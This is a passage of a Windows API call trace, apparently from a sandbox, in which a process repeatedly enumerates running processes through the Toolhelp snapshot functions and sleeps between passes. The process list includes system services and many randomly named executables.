szExeFile="manuals_z.exe")) returned 1 [0106.233] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.234] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.235] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.236] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.237] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.238] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.239] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.242] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.243] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.244] CloseHandle (hObject=0xc4) returned 1 [0106.244] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0106.249] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.251] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.252] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.252] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.253] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.253] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0106.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.260] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0106.261] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.262] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0106.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.319] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.326] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.327] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.328] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.329] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.330] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.331] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.332] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.333] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.334] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.335] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.336] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.337] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0106.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0106.339] CloseHandle (hObject=0xbc) returned 1 [0106.339] Sleep (dwMilliseconds=0x12c) [0106.651] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0106.681] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0106.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.688] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0106.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.690] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.691] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.691] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.692] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.693] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0106.693] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, 